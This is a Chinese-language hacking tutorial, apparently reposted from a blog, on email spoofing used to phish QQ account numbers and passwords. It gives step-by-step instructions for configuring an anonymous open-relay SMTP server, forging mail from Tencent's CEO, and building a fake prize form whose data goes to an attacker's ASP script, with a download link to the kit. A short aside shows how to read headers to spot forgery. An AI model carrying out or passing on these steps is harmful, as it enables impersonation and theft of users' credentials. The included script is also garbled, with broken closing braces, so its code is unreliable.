E-MAIL欺骗攻击

E-MAIL欺骗攻击 我们的经常会收到这样的手机短信，恭喜你中了xx公司大奖，奖品为万元NEC笔记本电脑一部，中奖查寻电话xxxxxx。如果我们顺着这部电话打过去，便有一位声音甜甜的小姐百般热情地回复，你确实百分百中了我公司大奖，只需汇来邮寄奖品的邮费Ｎ元，笔记本电脑就指日可待了。自然，这是一个骗局，如果你真的汇去了邮费，那可是肉包子打狗有去无回了。黑客的入侵技巧中，欺骗也是一个重要的手段，而且黑客的手法远比生活中的骗局来得隐蔽、巧妙和阴险。像我准备开始进行一次E-MAIL欺骗，准备冒充腾迅公司总裁给部份ＱＱ用户群发一份邮件，声明腾迅公司正在进行随机有奖抽查，只需将你的ＱＱ号码和密码在一个表格内填好，你将有机会获得一个6位靓号ＱＱ。当然，只要接收到邮件的用户如果真的如实填写了这份表格的话，他的ＱＱ号码和密码将会被我收集。要实行这样一个骗局，我最少要做到三点才可能成功。第一，因为要发邮件，所以我需要一个smtp服务器用于邮寄我的欺骗表格。这个smtp服务器最好不要有身份验证，也不能是网上申请的免费或收费的smtp服务器，因为这样的服务器往往会在你发出在邮件结尾带上它的网站广告，很容易引人怀疑你发出的邮件是否为腾迅公司所发。第二，我要做到让接收人看到我发出的邮件的确是腾迅公司所发，邮件发出人是腾迅公司总裁，邮件地址是类似[email protected]这样的邮件格式。第三，我要写一个ASP或PHP的后台脚本放在某一个空间上用于接收被骗用户填写的前台表格数据，当然这个表格页面我也要尽量做到让用户相信这是腾迅公司所制。好，明白这三点要求后我们开工吧。

　　满足第一点要求，构造自己的smtp服务器。我们并不需要安装额外的邮件服务器，Windows XP和2000本身就拥有构建SMTP服务器的功能，只是可能有的人还没有安装。选择“控制面板→添加/删除程序→添加/删除Windows组件”，弹出“Windows组件向导”对话框，在其中双击“Internet信息服务(IIS)”项，就会打开详细选择项，选中“SMTP Service”，按“确定”，插入Win2000安装盘进行安装(如图1)。

始菜单→程序→Internet服务管理器”打开Internet信息服务设置窗口,在窗口左侧点击本地计算机名，展开本地计算机目录，可以看到有两个分支“Web站点”和“默认SMTP虚拟服务器”。在“默认SMTP虚拟服务器”上点击鼠标右键选择“属性”，打开“默认SMTP虚拟服务器属性”窗口。
　　“常规”选项卡主要设置IP地址，单击IP地址下拉项选择你机器的ip地址，像我的机器设为192.168.1.3，你的机器可能是“127.0.0.1”，表示指向本地计算机IP地址，其他项使用默认即可。如果你是局域网接入，拥有固定IP地址，那么IP地址就应该选择相应的地址(如图2)。

“访问”选项卡中设置访问权限。单击“身份验证”，选择“匿名访问”，表示任何用户都可以发送，其他两项不用选择；(如图３)。

单击“连接控制”中的“连接”和“中继限制”中的“中继”，选中“仅以下列表除外”，表示可以许接入所有用户的访问。
(如图4图5)


只要我们设置好了“默认SMTP虚拟服务器属性”的“常规”和“访问”这两个选项卡，我们的smtp服务器就基本构建成功了，其它的选项卡用默认就可以了，我们现在已经能用自己的机器发信了。我们动手进行第二步吧。

　　满足第二点要求，伪造腾迅公司的发信人和发信地址。我用的是Outlook express。依次点工具→帐户→填加→邮件，在出现在internet连接对话框中，我写入的是“腾迅公司总裁马化腾“。(如图6)

当然这里你要想冒充腾迅公司哪位人士就填上谁的名字好了。来到的下一步，写入一个假的邮件地址，我伪造的是[email protected]。（如图７）

再来到关键下一步，在邮件接收器中随便写一个邮件接收地址，像pop3.163.net，不过注意的是要在邮件发送服务器中填写好我们先前设置好的smtp服务器地址，像我机器是192.168.1.3。（如图8）。

剩下的最后一步，你就可以乱填了，反正无关大局。邮件帐户设置一切就绪后，我再用outlook express给我的两个邮箱[email protected]和[email protected]写同样的一封信吧。（如图9)。

写完后我们开始发送这两封邮件，一瞬间邮件就发送成功了，自己构造的这个smtp服务器还真比网上的收费smtp服务器速度快很多。此时，我去[email protected]收取我的信件，看到了这样的一封邮件。（如图10)

，看图10中的邮件发送人正是腾迅公司总裁马化腾[email protected]！这是不是很具备欺骗性呢？这里我也顺便给大家说一下如何识破真正的发信人地址，像我用outlook express将我的[email protected]里的同样一封信收在本地电脑，在收到的信件上点鼠标右键→查看信件属性→详细资料，你会看到这样的首行：Received: from rich (unknown [218.59.97.87])。这个ip地址正好是我发信时我机器在internet时的ip地址。（如图11)。

这个ip地址是不是腾迅公司的那就是一目了然地事情了。

　　满足第三点要求，编写后台脚本接收用户输入表单。我这里做了一个前台的输入表单页面reg.htm。如果邮件接收人打开的话将看到如图12所示的页面（如图12)。

当然要如何更大地获取邮件接收人的信任，要看你做网页的水平和狡黠程度了。本人忠厚老实，也只能做出这样的水平。不过我用一个js小脚本，可以在这个reg.htm显示腾迅网站的20个QQ秀形象，以便增加这个表单的可信度。这个js脚本很简单，源码如下：
<script>
function writ(x,xx)
{
for (img=1;img<=x;img++)
{
document.writeln("<IMG src=http://qqshow-user.tencent.com/10000/"+xx+"/"+img+"></IMG>");
if (img%5==0) document.writeln("<br>");
>
>
for (num=20;num<=20;num++)
{
if (num==20) writ(20,num);
document.writeln("<br>");
>
</script> 　　
你只要将最后一个20改为其它的数字，就可以显示不同数量的ＱＱ秀形象了。这个reg.htm我作为附件发送给了用户，接收数据的save.asp却放在我网站的一个asp空间上。只要是用户如实填写了图12的表格，save.asp就会将数据接收放在我的asp空间的lcx.txt这一文件里。懂asp脚本的朋友都明白，这是因为在reg.htm的源码里我指定了接收表单的地址：action = "http://我的asp空间地址/save.asp"。而且我在save.asp也做了手脚，这个脚本接收完用户发送的数据后，会自动跳转到腾迅公司的网站www.tencent.com。（附上reg.htm和save.asp)http://www.haiyang.net/safety/mail/m.rar

　　看完了这样的一个EMAIL欺骗攻击，你可能会觉得不屑，心想就算是被骗，也只不过掉了一个垃圾ＱＱ而已。但是你想到了没有，虽然全文我用的是如何骗QQ来举例，但是黑客完全可以利用一个同样的手法来骗走你网站的FTP密码再来黑掉你的网站，呵呵，这就不是小事情了吧。总之，收到奇怪的邮件的话，还是小心为妙。

（出处：http://www.sheup.com）